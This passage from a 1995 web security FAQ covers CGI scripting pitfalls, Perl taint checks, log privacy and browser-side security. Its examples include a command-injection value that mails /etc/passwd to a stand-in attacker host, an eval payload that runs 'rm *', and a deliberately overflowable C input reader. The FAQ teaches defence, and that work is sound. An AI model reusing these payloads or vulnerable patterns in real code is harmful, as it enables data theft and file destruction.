CGI scripts are potential security holes even if you run your server as "nobody". A subverted CGI script running as "nobody" still has enough privileges to mail out the system password file, examine the network information maps, or launch a log-in session on a high-numbered port (it takes just a few lines of Perl to accomplish each of these). Even if your server runs in a chroot directory, a buggy CGI script can leak sufficient system information to compromise the host.


Q30: Is it better to store scripts in the cgi-bin directory, or to store them anywhere in the document tree and identify them to the server using the .cgi extension?

Although there's nothing intrinsically dangerous about scattering CGI scripts around the document tree, it's better to store them in the cgi-bin directory. Because CGI scripts are such potentially large security holes, it's much easier to keep track of what scripts are installed on your system if they're kept in a central location rather than scattered among multiple directories. This is particularly true in an environment with multiple Web authors. It's just too easy for an author to inadvertently create a buggy CGI script and install it somewhere in the document tree. By restricting CGI scripts to the cgi-bin directory and by setting up permissions so that only the Web administrator can install these scripts, you avoid this chaotic situation.

There's also a risk of a hacker managing to create a .cgi file somewhere in your document tree and then executing it remotely by requesting its URL. A tightly controlled cgi-bin directory lessens the possibility of this happening.


Q31: Are compiled languages such as C safer than interpreted languages like Perl and shell scripts?

The answer is "yes", but with many qualifications and explanations.

First of all is the issue of the remote user's access to the script's source code. The more the hacker knows about how a script works, the more likely he is to find bugs to exploit. With a script written in a compiled language like C, you can compile it to binary form, place it in cgi-bin/, and not worry about intruders gaining access to the source code. However, with an interpreted script, the source code is always potentially available. Even though a properly-configured server will not return the source code to an executable script, there are many scenarios in which this can be bypassed.

Consider the following scenario. For convenience's sake, you've decided to identify CGI scripts to the server using the .cgi extension. Later on, you need to make a small change to an interpreted CGI script. You open it up with the Emacs text editor and modify the script. Unfortunately the edit leaves a backup copy of the script source code lying around in the document tree. Although the remote user can't obtain the source code by fetching the script itself, he can now obtain the backup copy by blindly requesting the URL:

        http://your-site/a/path/your_script.cgi~

(This is another good reason to limit CGI scripts to cgi-bin and to make sure that cgi-bin is separate from the document root.)

Of course in many cases the source code to a CGI script written in C is freely available on the Web, and the ability of hackers to steal the source code isn't an issue.

Another reason that compiled code may be safer than interpreted code is the size and complexity issue. Big software programs, such as shell and Perl interpreters, are likely to contain bugs. Some of these bugs may be security holes. They're there, but we just don't know about them.

A third consideration is that scripting languages make it extremely easy to send data to system commands and capture their output. As explained below, the invocation of system commands from within scripts is one of the major potential security holes. In C, it's more effort to invoke a system command, so it's less likely that the programmer will do it. In particular, it's very difficult to write a shell script of any complexity that completely avoids dangerous constructions. Shell scripting languages are poor choices for anything more than trivial CGI programs.

All this being said, please understand that I am not guaranteeing that a compiled program will be safe. C programs can contain many exploitable bugs, as the net's experiences with NCSA httpd 1.3 and sendmail show. Counterbalancing the problems with interpreted scripts is that they tend to be shorter and are therefore more easily understood by people other than the author. Furthermore, Perl contains a number of built-in features designed to catch potential security holes. For example, the taint checks (see below) catch many of the common pitfalls in CGI scripting, and may make a Perl script safer in some respects than the equivalent C program.


Q32: I found a great CGI script on the Web and I want to install it. How can I tell if it's safe?

You can never be sure that a script is safe. The best you can do is to examine it carefully and understand what it's doing and how it's doing it. If you don't understand the language the script's written in, show it to someone who does.

Things to think about when you examine a script:

  1. How complex is it? The longer it is, the more likely it is to have problems.
  2. Does it read or write files on the host system? Programs that read files may inadvertently violate access restrictions you've set up, or pass sensitive system information to hackers. Programs that write files have the potential to modify or damage documents, or, in the worst case, introduce trojan horses to your system.
  3. Does it interact with other programs on your system? For example, many CGI scripts send e-mail in response to a form input by opening up a connection with the sendmail program. Is it doing this in a safe way?
  4. Does it run with suid (set-user-id) privileges? In general this is a very dangerous thing and scripts need to have excellent reasons for doing this.
  5. Does the author validate user input from forms? Checking form input is a sign that the author is thinking about security issues.
  6. Does the author use explicit path names when invoking external programs? Relying on the PATH environment variable to resolve partial path names is a dangerous practice.

Q33: What CGI scripts are known to contain security holes?

Quite a number of widely distributed CGI scripts contain known security holes. All the ones that are identified here have since been caught and fixed, but if you are running an older version of the script you may still be vulnerable. Get rid of it and obtain the latest version.
AnyForm
http://www.uky.edu/~johnr/AnyForm2
FormMail
http://alpha.pr1.k12.co.us/~mattw/scripts.html

The holes in these scripts were discovered by Paul Phillips (paulp@cerf.net), who also wrote the CGI security FAQ; see that FAQ for reports of other buggy scripts.

In addition, one of the scripts given as an example of "good CGI scripting" in the published book "Build a Web Site" by net.Genesis and Devra Hall contains the classic error of passing an unchecked user variable to the shell. The script in question is in Section 11.4, "Basic Search Script Using Grep", page 443. Other scripts in this book may contain similar security holes.

This list is far from complete. No centralized authority is monitoring all the CGI scripts that are released to the public. Ultimately it's up to you to examine each script and make sure that it's not doing anything unsafe.


Q34: I'm developing custom CGI scripts. What unsafe practices should I avoid?

  1. Avoid giving out too much information about your site and server host.

    Although they can be used to create neat effects, scripts that leak system information are to be avoided. For example, the "finger" command often prints out the physical path to the fingered user's home directory and scripts that invoke finger leak this information (you really should disable the finger daemon entirely, preferably by removing it). The w command gives information about what programs local users are using. The ps command, in all its shapes and forms, gives would-be intruders valuable information on what daemons are running on your system.

  2. If you're coding in a compiled language like C, avoid making assumptions about the size of user input.

    A MAJOR source of security holes has been coding practices that allowed character buffers to overflow when reading in user input. Here's a simple example of the problem:

    #include <stdlib.h>
    #include <stdio.h>

    static char query_string[1024];

    char* read_POST() {
       int query_size;
       query_size=atoi(getenv("CONTENT_LENGTH"));
       fread(query_string,query_size,1,stdin);
       return query_string;
    }
    The problem here is that the author has made the assumption that user input provided by a POST request will never exceed the size of the static input buffer, 1024 bytes in this example. This is not good. A wily hacker can break this type of program by providing input many times that size. The buffer overflows and crashes the program; in some circumstances the crash can be exploited by the hacker to execute commands remotely.

    Here's a simple version of the read_POST() function that avoids this problem by allocating the buffer dynamically. If there isn't enough memory to hold the input, it returns NULL:

    char* read_POST() {
       int query_size=atoi(getenv("CONTENT_LENGTH"));
       char* query_string = (char*) malloc(query_size+1); /* +1 for terminating null */
       if (query_string != NULL) {
          fread(query_string,query_size,1,stdin);
          query_string[query_size]='\0'; /* null-terminate for the string functions below */
       }
       return query_string;
    }
    Of course, once you've read in the data, you should continue to make sure your buffers don't overflow. Watch out for strcpy(), strcat() and other string functions that blindly copy strings until they reach the end. Use the strncpy() and strncat() calls instead.
       #define MAXSTRINGLENGTH 256
       char myString[MAXSTRINGLENGTH];
       char* query = read_POST();
       myString[MAXSTRINGLENGTH-1]='\0';      /* ensure null byte */
       strncpy(myString,query,MAXSTRINGLENGTH-1); /* don't overwrite null byte */
    
    (Note that the semantics of strncpy are nasty when the input string is exactly MAXSTRINGLENGTH bytes long, leading to some necessary fiddling with the terminating NULL.)
  3. Never, never, never pass unchecked remote user input to a shell command.

    In C this includes the popen() and system() calls, both of which invoke a /bin/sh subshell to process the command. In Perl this includes system(), exec(), and piped open() functions, as well as the eval() function for invoking the Perl interpreter itself. In the various shells, this includes the exec and eval commands.

    Backtick quotes, available in shell interpreters and Perl for capturing the output of programs as text strings, are also dangerous.

    The reason for this bit of paranoia is illustrated by the following bit of innocent-looking Perl code that tries to send mail to an address indicated in a fill-out form.

       $mail_to = &get_name_from_input; # read the address from form
       open (MAIL,"| /usr/lib/sendmail $mail_to");
   print MAIL "To: $mail_to\nFrom: me\n\nHi there!\n";
       close MAIL;
    
    The problem is in the piped open() call. The author has assumed that the contents of the $mail_to variable will always be an innocent e-mail address. But what if the wily hacker passes an e-mail address that looks like this?
         nobody@nowhere.com;mail badguys@hell.org</etc/passwd;
    
    Now the open() statement will evaluate the following command:
    /usr/lib/sendmail nobody@nowhere.com; mail badguys@hell.org</etc/passwd
    
    Unintentionally, open() has mailed the contents of the system password file to the remote user, opening the host to a password-cracking attack.

Q35: But if I avoid eval(), exec(), popen() and system(), how can I create an interface to my database/search engine/graphics package?

You don't have to avoid these calls completely. You just have to understand what you're doing before you call them. In some cases you can avoid passing user-supplied variables through the shell by calling external programs differently. For example, sendmail supports a -t option, which tells it to ignore the address given on the command line and take its To: address from the e-mail header. The example above can be rewritten to take advantage of this feature as shown below (it also uses the -oi flag to prevent sendmail from ending the message prematurely if it encounters a period at the start of a line):
   $mail_to = &get_name_from_input; # read the address from form
   open (MAIL,"| /usr/lib/sendmail -t -oi");
   print MAIL <<END;
   To: $mail_to
   From: me (me\@nowhere.com)
   Subject: nothing much

   Hi there!
   END
   close MAIL;
C programmers can use the exec family of functions to pass arguments directly to programs rather than going through the shell. This can also be accomplished in Perl using the technique described below.

You should try to find ways not to open a shell. In the rare cases when you have no choice, you should always scan the arguments for shell metacharacters and remove them. In fact, it's wise policy to make sure that all user input arguments are what you expect. Even if you don't pass user variables through the shell, you can never be sure that they don't contain constructions that reveal bugs in the programs you're calling.

For example, here's a way to make sure that the $mail_to address created by the user really does look like a valid address:

  $mail_to = &get_name_from_input; # read the address from form
  unless ($mail_to =~ /^[\w.-]+\@[\w.-]+$/) {
     die 'Address not in form foo@nowhere.com';
  }
(This particular pattern match may be too restrictive for some sites. It doesn't allow UUCP-style addresses or any of the many alternative addressing schemes).

Q36: Is it safe to rely on the PATH environment variable to locate external programs?

Not really. A favorite hacker trick is to alter the PATH environment variable so that it points to the program he wants your script to execute rather than the program you're expecting. In addition to avoiding passing unchecked user variables to external programs, you should also invoke the programs using their full absolute pathnames rather than relying on the PATH environment variable. That is, instead of this fragment of C code:
   system("ls -l /local/web/foo");
use this:
   system("/bin/ls -l /local/web/foo");
If you must rely on the PATH, set it yourself at the beginning of your CGI script:
   putenv("PATH=/bin:/usr/bin:/usr/local/bin");

In general it's not a good idea to put the current directory (".") into the path.


Q37: I hear there's a package called cgiwrap that makes CGI scripts safe?

This is not quite true. cgiwrap (by Nathan Neulinger <nneul@umr.edu>, http://www.umr.edu/~cgiwrap) was designed for multi-user sites like university campuses where local users are allowed to create their own scripts. Since CGI scripts run under the server's user ID (e.g. "nobody"), it is difficult under these circumstances for administrators to determine whose script is generating bounced mail, errors in the server log, or annoying messages on other users' screens. There are also security implications when all users' scripts run with the same permissions: one user's script can unintentionally (or intentionally) trash the database maintained by another user's script.

cgiwrap allows you to put a wrapper around CGI scripts so that a user's scripts now run under his own user ID. This policy can be enforced so that users must use cgiwrap in order to execute CGI scripts. Although this simplifies administration and prevents users from interfering with each other, it does put the individual user at tremendous risk. Because his scripts now run with his own permissions, a subverted CGI script can trash his home directory by executing the command

    rm -r ~

Worse, since the subverted CGI script has write access to the user's home directory, it could place a trojan horse in the user's directory that will subvert the security of the entire system. The "nobody" user, at least, usually doesn't have write permission anywhere.


Q38: People can only use scripts if they're accessed from a form that lives on my local system, right?

Not right. Although you can restrict access to a script to certain IP addresses or to user name/password combinations, you can't control how the script is invoked. A script can be invoked from any form, anywhere in the world. Or its form interface can be bypassed entirely and the script invoked by directly requesting its URL. Don't assume that a script will always be invoked from the form you wrote to go with it. Anticipate that some parameters will be missing or won't have the expected values.
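A minimal sketch of this sort of defensive parameter handling might look like the following (the &get_form_params routine is a hypothetical form parser, not part of any standard library):

   %params = &get_form_params;        # hypothetical form-parsing routine
   $count = $params{'count'};
   $count = 10 unless defined $count;            # supply a default if the field is missing
   unless ($count =~ /^(\d{1,3})$/) {            # insist on a small positive integer
      print "Content-type: text/plain\n\n";
      print "Bad value for the count parameter.\n";
      exit 0;
   }
   $count = $1;                                  # this also untaints the value (see section 7)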

When restricting access to a script, remember to put the restrictions on the _script_ as well as any HTML forms that access it. It's easiest to remember this when the script is of the kind that generates its own form on the fly.


Q39: Can people see or change the values in "hidden" form variables?

They sure can! The hidden variable is visible in the raw HTML that the server sends to the browser. To see the hidden variables, a user just has to select "view source" from the browser menu. In the same vein, there's nothing preventing a user from setting hidden variables to whatever he likes and sending them back to your script. Don't rely on hidden variables for security.
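For example, rather than trusting a price carried in a hidden field, look the value up again on the server side. Here is a minimal sketch (the &get_form_params routine and the price list are hypothetical):

   %params = &get_form_params;                   # hypothetical form parser
   $item = $params{'item'};
   %prices = ('widget' => 9.95, 'gadget' => 24.95);   # authoritative server-side prices
   $price = $prices{$item};
   defined $price || die "unknown item: $item";
   # charge $price, not whatever the hidden field claimed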

Q40: Is using the "POST" method for submitting forms more private than "GET"?

If you are concerned about your queries showing up in server logs, or in the logs of Web proxies along the way, this is true. A query submitted with GET is embedded in the URL itself (for example, /cgi-bin/search?q=takeover+target) and so is recorded wherever URLs are logged, while queries submitted with POST usually are not. In other respects, however, there's no substantial difference in security between the two methods. It is just as easy to intercept an unencrypted GET query as a POST query. Furthermore, unlike some early implementations of HTTP encryption, the current generation of data-encrypting server/browser combinations do just as good a job encrypting GET requests as they do POST requests.

Q41: Where can I learn more about safe CGI scripting?

The CGI security FAQ, maintained by Paul Phillips ( paulp@cerf.net), can be found at:

http://www.primus.com/staff/paulp/cgi-security/

CGI security is also covered by documentation maintained at NCSA:

http://hoohoo.ncsa.uiuc.edu/cgi/security.html

Table of contents


7. Safe Scripting in Perl

Q42: How do I avoid passing user variables through a shell when calling exec() and system()?

In Perl, you can invoke external programs in many different ways. You can capture the output of an external program using backticks:
   $date = `/bin/date`;

You can open up a pipe to a program:

   open (SORT, "| /usr/bin/sort | /usr/bin/uniq");
You can invoke an external program and wait for it to return with system():
   system "/usr/bin/sort < foo.in";
or you can invoke an external program and never return with exec():
   exec "/usr/bin/sort < foo.in";
All of these constructions can be risky if they involve user input that may contain shell metacharacters. For system() and exec(), there's a somewhat obscure syntactical feature that allows you to call external programs directly rather than going through a shell. If you pass the arguments to the external program, not in one long string, but as separate members in a list, then Perl will not go through the shell and shell metacharacters will have no unwanted side effects. For example:
   system "/usr/bin/sort","foo.in";
You can take advantage of this feature to open up a pipe without going through a shell. By calling open on the magic character sequence |-, you fork a copy of Perl and open a pipe to the copy. The child copy then immediately exec's another program using the argument list variant of exec().
   open (SORT,"|-") || exec "/usr/bin/sort",$uservariable;
   foreach $line (@lines) {
     print SORT $line,"\n";
   }
   close SORT;
To read from a pipe without opening up a shell, you can do something similar with the sequence -|:
   open(GREP,"-|") || exec "/usr/bin/grep",$userpattern,$filename;
   while (<GREP>) {
     print "match: $_";
   }
   close GREP;
These are the forms of open() you should use whenever you would otherwise perform a piped open to a command.

An even more obscure feature allows you to call an external program and lie to it about its name. This is useful for calling programs that behave differently depending on the name by which they were invoked.

The syntax is

   system $real_name "fake_name","argument1","argument2";
For example:
   $shell = "/bin/sh";
   system $shell "-sh","-norc";
This invokes the shell under the name "-sh", making it behave as if it were a login shell. Note that the real name of the program must be stored in a variable, and that there's no comma between the variable holding the real name and the start of the argument list.

There's also a more compact syntax for this construction:

   system { "/bin/sh" } "-sh","-norc";

Q43: What are Perl taint checks? How do I turn them on?

As we've seen, one of the most frequent security problems in CGI scripts is inadvertently passing unchecked user variables to the shell. Perl provides a "taint" checking mechanism that prevents you from doing this. Any variable that is set using data from outside the program (including data from the environment, from standard input, and from the command line) is considered tainted and cannot be used to affect anything else outside your program. The taint can spread. If you use a tainted variable to set the value of another variable, the second variable also becomes tainted. Tainted variables cannot be used in eval(), system(), exec() or piped open() calls. If you try to do so, Perl exits with a warning message. Perl will also exit if you attempt to call an external program without explicitly setting the PATH environment variable.

You turn on taint checks in version 4 of Perl by using a special version of the interpreter named "taintperl":

   #!/usr/local/bin/taintperl
In version 5 of Perl, pass the -T flag to the interpreter:
   #!/usr/local/bin/perl -T
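To see the checks in action, consider this minimal hypothetical script. The one-argument form of system() would pass its tainted argument through a shell, so Perl refuses to run it:

   #!/usr/local/bin/perl -T
   $ENV{'PATH'} = '/bin:/usr/bin';      # set the PATH explicitly (see Q44)
   $file = $ENV{'QUERY_STRING'};        # tainted: arrives from the outside world
   system "/bin/cat $file";             # Perl dies with "Insecure dependency in system"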
See below for how to "untaint" a variable.

Q44: OK, I turned on taint checks like you said. Now my script dies with the message: "Insecure $ENV{PATH} at line XX" every time I try to run it!

Even if you don't rely on the path when you invoke an external program, there's a chance that the invoked program might. Therefore you need to include the following line towards the top of your script whenever you use taint checks:
   $ENV{'PATH'} = '/bin:/usr/bin:/usr/local/bin';
Adjust this as necessary for the list of directories you want searched. It's not a good idea to include the current directory (".") in the path.

Q45: How do I "untaint" a variable?

Once a variable is tainted, Perl won't allow you to use it in a system(), exec(), piped open, eval(), backtick command, or any function that affects something outside the program (such as unlink). You can't use it even if you scan it for shell metacharacters or use the tr/// or s/// commands to remove metacharacters. The only way to untaint a tainted variable is by performing a pattern matching operation on it and extracting the matched substrings. For example, if you expect a variable to contain an e-mail address, you can extract an untainted copy of the address in this way:
   if ($mail_address =~ /([\w.-]+\@[\w.-]+)/) {
      $untainted_address = $1;
   }

Q46: I'm removing shell metacharacters from the variable, but Perl still thinks it's tainted!

See the answer to the question above. The only way to untaint a variable is to extract substrings using a pattern matching operation.

Q47: Is it true that the pattern matching operation $foo=~/$user_variable/ is unsafe?

A frequent task for Perl CGI scripts is to take a list of keywords provided by the remote user and to use them in a pattern matching operation to fetch a list of matching file names (or something similar). This, in and of itself, isn't dangerous. What is dangerous is an optimization that many Perl programmers use to speed up the pattern matching operation. When you use a variable inside a pattern matching operation, the pattern is recompiled every time the operation is invoked. In order to avoid this expensive recompilation, you can provide the "o" flag to the pattern matching operation to tell Perl to compile the expression once:
    foreach (@files) {
       m/$user_pattern/o;
    }
Now, however, Perl will ignore any changes you make to the user variable, making this sort of loop fail:
    foreach $user_pattern (@user_patterns) {
       foreach (@files) {
          print if m/$user_pattern/o;
       }
    }
To get around this problem Perl programmers often use this sort of trick:
   foreach $user_pattern (@user_patterns) {
      eval "foreach (\@files) { print if m/$user_pattern/o; }";
   }
The problem here is that the eval() statement involves a user-supplied variable. Unless this variable is checked carefully, the eval() statement can be tricked into executing arbitrary Perl code. (For an example of what can happen, consider what the eval statement does if the user passes in this pattern: /; system 'rm *'; /.)

The taint checks described above will catch this potential problem. Your alternatives include using the unoptimized form of the pattern matching operation, or carefully untainting user-supplied patterns. In Perl 5, a useful trick is to use the escape sequence \Q...\E to quote metacharacters so that they won't be interpreted:

   print if m/\Q$user_pattern\E/o;

Q48: My CGI script needs more privileges than it's getting as user "nobody". How do I run a Perl script as suid?

First of all, do you really need to run your Perl script as suid? This represents a major risk insofar as giving your script more privileges than the "nobody" user has also increases the potential for damage that a subverted script can cause. If you're thinking of giving your script root privileges, think it over extremely carefully.

You can make a script run with the privileges of its owner by setting its "s" bit:

   chmod u+s foo.pl
You can make it run with the privileges of its owner's group by setting the s bit in the group field:
   chmod g+s foo.pl
However, many Unix systems contain a hole that allows suid scripts to be subverted. This hole affects only scripts, not compiled programs. On such systems, an attempt to execute a Perl script with the suid bits set will result in a nasty error message from Perl itself.

You have two options on such systems:

  1. You can apply a patch to the kernel that disables the suid bits for scripts. Perl will detect these bits nevertheless and perform the suid function safely itself. See the Perl FAQ for details on obtaining this kernel patch. The FAQ can be found at:

    ftp://rtfm.mit.edu/pub/usenet-by-group/comp.lang.perl/

  2. You can put a C wrapper around the program. A typical wrapper looks like this:
           #include <unistd.h>

           int main () {
              execl("/usr/local/bin/perl","foo.pl","/local/web/cgi-bin/foo.pl",(char*)NULL);
              return 1;   /* reached only if execl() fails */
           }
           
    After compiling this program, make it suid. It will run with its owner's permissions, launching a Perl interpreter and executing the statements in the file "foo.pl".

Another option is to run the server itself as a user that has sufficient privileges to do whatever the scripts need to do. If you're using the CERN server, you can even run as a different user for each script. See the CERN documentation for details.

Table of contents


8. Server Logs and Privacy

(Thanks to Bob Bagwill who contributed many of the Q&A's in this section)

Q49: What information do readers reveal that they might want to keep private?

Most servers log every access. The log usually includes the IP address and/or host name, the time of the download, the user's name (if known by user authentication or obtained by the identd protocol), the URL requested (including the values of any variables from a form submitted using the GET method), the status of the request, and the size of the data transmitted. Some browsers also reveal the name of the client software the reader is using, the URL the reader came from, and the user's e-mail address. Servers can log this information as well, or make it available to CGI scripts. Most WWW clients are probably run from single-user machines, so a download can usually be attributed to an individual. Revealing any of these data could be damaging to a reader.
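For illustration, a typical entry in the common log format used by the NCSA and CERN servers looks something like this (host name, user name, and URL are hypothetical):

 prez.xyz.com - fred [05/Sep/1995:18:31:05 -0500] "GET /reports/abc-financials.html HTTP/1.0" 200 10352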

For example, XYZ.com downloading financial reports on ABC.com could signal a corporate takeover. Accesses to an internal job posting reveal who might be interested in changing jobs. The time at which a cartoon was downloaded may reveal a reader who is misusing company resources. A referral log entry might contain something like:

 file://prez.xyz.com/hotlists/stocks2sellshort.html -> http://www.xyz.com/

The pattern of accesses made by an individual can reveal how they intend to use the information. And the input to searches can be particularly revealing.

Another way Web usage can be revealed locally is via browser history, hotlists, and cache. If someone has access to the reader's machine, they can check the contents of those databases. An obvious example is shared machines in an open lab or public library.

Proxy servers used for access to Web services outside an organization's firewall are in a particularly sensitive position. A proxy server will log every access to the outside Web made by every member of the organization and track both the IP number of the host making the request and the requested URL. A carelessly managed proxy server can therefore represent a significant invasion of privacy.


Q50: Do I need to respect my readers' privacy?

Yes. One of the requirements of responsible net citizenship is respecting the privacy of others. Just as you don't forward or post private e-mail without the author's consent, in general you shouldn't use or post Web usage statistics that can be attributed to an individual.

If you are a government site, you may be required by law to protect the privacy of your readers. For example, U.S. Federal agencies are not allowed to collect or publish many types of data about their clients.

In most U.S. states, it is illegal for libraries and video stores to sell or otherwise distribute records of the materials that patrons have checked out. While the courts have yet to apply the same legal standard to electronic information services, it is not unreasonable for users to expect the same degree of privacy on the Web. In other countries, for example Germany, the law explicitly forbids the disclosure of online access lists. If your site chooses to use its Web logs to populate mailing lists or to resell to other businesses, make sure you clearly advertise that fact.


Q51: How do I avoid collecting too much information?

One of the requirements of your Web site may be to collect statistics on usage to provide data to the organization and to justify Web site resources. In general, collecting information about accesses by individuals is probably not warranted or even useful.

The easiest way to avoid collecting too much information is to use a server that allows you to tailor the output logs, so that you can throw away everything but the essentials. Another way is to regularly summarize and discard the raw logs. Since the logs of popular sites tend to grow quickly, you probably will need to do that anyway.
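As a minimal sketch of the second approach, the following script (which assumes logs in the common log format; adapt the field parsing to your server) tallies hits per URL and counts distinct hosts, after which the raw, privacy-sensitive log can be thrown away:

   #!/usr/local/bin/perl
   # Summarize an access log given on the command line or standard input.
   while (<>) {
      ($host) = split(' ',$_,2);        # first field is the requesting host
      ($url) = m!"[A-Z]+ (\S+)!;        # pull the URL out of the request string
      next unless defined $url;
      $hits{$url}++;
      $hosts{$host}++;
   }
   print scalar(keys %hosts), " distinct hosts\n\n";
   foreach $url (sort { $hits{$b} <=> $hits{$a} } keys %hits) {
      print "$hits{$url}\t$url\n";
   }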


Q52: How do I protect my readers' privacy?

There are two classes of readers: outsiders reading your documents, and insiders reading your documents and outside documents.

You can protect outsiders by summarizing your logs. You can help protect insiders by:

  1. having a clear site policy on Web usage.
  2. educating them about the site policy and risks of Web usage.
  3. using a site-wide proxy cache to hide the identity of individual hosts from outside servers.

If your site does not want to reveal certain Web accesses from your site's domain, you may need to get Web client accounts from another Internet provider that can provide anonymous access.

Table of contents


9. Client Side Security

(Thanks to Laura Pearlman, who contributed many of the Q&A's in this section).

Q53: Someone suggested I configure /bin/csh as a viewer for documents of type application/x-csh. Is this a good idea?

This is not a good idea. Configuring any command-line shell, interpreter, macro processor, or scripting language processor as the "viewer" for a document type leaves you vulnerable to attack over the Web. You should never blindly execute any program you download from the Internet (including programs obtained by FTP). It is safer to download a script as text, look it over to make sure it isn't doing anything malicious, and then run it by hand.

These words of warning apply also to the macro worksheets generated by popular PC spreadsheet programs. Although it seems natural to declare a type "application/x-msexcel-macro" in order to receive spreadsheets that automatically recalculate themselves, some of the functions in the Excel macro language have the potential to inflict damage on other worksheets and files. These warnings even apply to such seemingly innocuous things as word processor style sheets and template files! Many high end word processors have a built-in macro processing ability. An example of the way in which word processing macros can be misused is the Microsoft Word "prank macro", which has the ability to spread, virus-like, from document to document.

I have heard of at least one individual who decided that he would use the C-shell viewer only for scripts written by himself and other trusted parties. He screened all URLs by hand to make sure they didn't end with a .csh extension before downloading them. Unfortunately the file extension is not a reliable way to determine what a URL contains. The type of a document is determined by the Web (HTTP) server, not the browser, and a document of type application/x-csh can just as easily have an extension of .txt or no extension at all.

In short, beware of declaring an external viewer for any file that contains executable statements.

This security problem is addressed by scripting languages such as Java and Safe Tcl, in which dangerous functions can be disabled. There's even a prototype "Safe Perl" that can be used as a safer external viewer for Perl programs.


Q54: Is there anything else I should keep in mind regarding external viewers?

Yes. Whenever you upgrade a program that you've configured as an external viewer, you should think about the issues raised in Q53 in light of the program's new features. For example, if the viewer is a word processor and the new version has just added scripting/macro features, is there any chance that loading and displaying a document could automatically launch a script?

Q55: How do I turn off the "You are submitting the contents of a form insecurely" message in Netscape? Should I worry about it?

This message indicates that the contents of a form that you're submitting to a CGI script are not encrypted and could be intercepted. Right now you'll get this message whenever you submit a form to any non-Netscape server, since only the Netsite Commerce Server can handle encrypted forms. You probably shouldn't send sensitive information such as credit card numbers via unencrypted forms (however, if you're the type who reads his credit card number over cellular phones, an even more insecure means of communication, go right ahead!).

To turn this warning off, select Preferences from Netscape's Options menu, choose "Images and Security", and uncheck the checkbox labeled "Warn before submitting forms insecurely."


Q56: How secure is the encryption used by SSL?

SSL uses public-key encryption to exchange a session key between the client and server; this session key is used to encrypt the HTTP transaction (both request and response). Each transaction uses a different session key, so that even if someone manages to decrypt a transaction, that doesn't mean they've found the server's secret key; if they want to decrypt another transaction, they'll need to spend as much time and effort on the second transaction as they did on the first.

Netscape servers and browsers do encryption using either a 40-bit secret key or a 128-bit secret key. Many people feel that using a 40-bit key is insecure because it's vulnerable to a "brute force" attack (trying each of the 2^40 possible keys until you find the one that decrypts the message). Using a 128-bit key eliminates this problem because there are 2^128 possible keys instead of 2^40: roughly 3.4 x 10^38 keys rather than about 10^12. Unfortunately, most Netscape users have browsers that support only 40-bit secret keys. This is because of legal restrictions on the encryption software that can be exported from the United States. (The Federal Government has recently modified this policy following the well-publicized cracking of a Netscape message encrypted with a 40-bit key; expect this situation to change.)

In Netscape you can tell what kind of encryption is in use for a particular document by looking at the "Document Information" screen accessible from the File menu. The little key in the lower left-hand corner of the Netscape window also indicates this information. A solid key with two teeth means 128-bit encryption, a solid key with one tooth means 40-bit encryption, and a broken key means no encryption. Even if your browser supports 128-bit encryption, it may use 40-bit encryption when talking to older Netscape servers or Netscape servers outside the U.S. and Canada.


Q57: My Netscape browser is displaying a form for ordering merchandise from a department store that I trust. The little key at the lower left-hand corner of the Netscape window is solid and has two teeth. This means I can safely submit my credit card number, right?

Not quite. A solid key with two teeth indicates that SSL is being used with a 128-bit secret key and that the remote host owns a valid server certificate certified by an authority that Netscape recognizes. At this point, however, you don't know who that certificate belongs to. It's possible that someone has bought or stolen a server certificate and then diverted network traffic destined for the department store by subverting a router somewhere between you and the store. The only way to make sure that you're talking to the company you think you're talking to is to open the "Document Information" window (from the File menu) and examine the server certificate. If the host and organization names that appear there match the company you expect, then it's probably safe to submit the form. If something unexpected appears there (like "Embezzlers R Us"), you might want to call the department store's 800 number.

Q58: How private are my requests for Web documents?

Read section 8 above. All requests for documents are logged by the Web server. Although your name is not usually logged, your IP address and your computer's host name usually are. In addition, some servers also log the URL you were viewing (such as your home page) at the time you requested the new URL. If the site is well administered, the record of your accesses will be used for statistics generation and debugging only. However, some sites may leave the logs open for casual viewing by local users at the site or even use them to create mailing lists.

The contents of queries in forms submitted using the GET request appear in the server log files because the query is submitted as part of the URL. However, when a query is submitted as a POST request (which is often the case when submitting a fill-out form), the data you submit doesn't get logged. If you are concerned about the contents of a keyword search appearing in a public log somewhere, check whether the search script uses the GET or POST method. The easiest technique is to try an innocuous query first. If the contents of the query appear in the URL of the retrieved document, then they probably appear in the remote server's logs too.

Server/browser combinations that use data encryption, such as Netsite/Netscape, encrypt the URL request. Furthermore the encrypted request, because it is submitted as a POST request, does not appear in the server logs.

Table of contents


10. Bibliography

General Security for Web Servers

  1. How to Set Up and Maintain a World Wide Web Site: The Guide for Information Providers, by Lincoln D. Stein (Addison-Wesley), 496 pages, list price $29.95, ISBN 0-201-63389-2 (information available at http://www-genome.wi.mit.edu/WWW/).
  2. Managing Internet Information Systems, by Cricket Liu, Jerry Peek, Russ Jones, Bryan Buus, and Adrian Nye (O'Reilly & Associates, Inc.), ISBN 1-56592-051-1

Firewalls

  1. Firewalls and Internet Security: Repelling the Wily Hacker, by William R. Cheswick and Steven M. Bellovin (Addison-Wesley), ISBN 0-201-63357-4
  2. Building Internet Firewalls, by D. Brent Chapman and Elizabeth D. Zwicky (O'Reilly & Associates), 1st edition, September 1995, 517 pages, list price $29.95, ISBN 1-56592-124-0 (information also available at http://www.greatcircle.com/firewalls-book/).

Unix System Security

  1. Unix System Security: A Guide for Users and System Administrators, by David Curry (O'Reilly & Associates).
  2. Practical Unix Security, by Simson Garfinkel and Gene Spafford (O'Reilly & Associates, Inc.), ISBN 0-937175-72-2

Cryptography

  1. Applied Cryptography, by Bruce Schneier (Wiley), 618 pages, $44.95, ISBN 0-471-59756-2.

Perl

  1. Programming Perl, by Larry Wall and Randal L. Schwartz (O'Reilly & Associates, Inc.), ISBN 0-937175-64-1
Table of contents
Lincoln D. Stein
Whitehead Institute for Biomedical Research

Last Modified September 9, 1995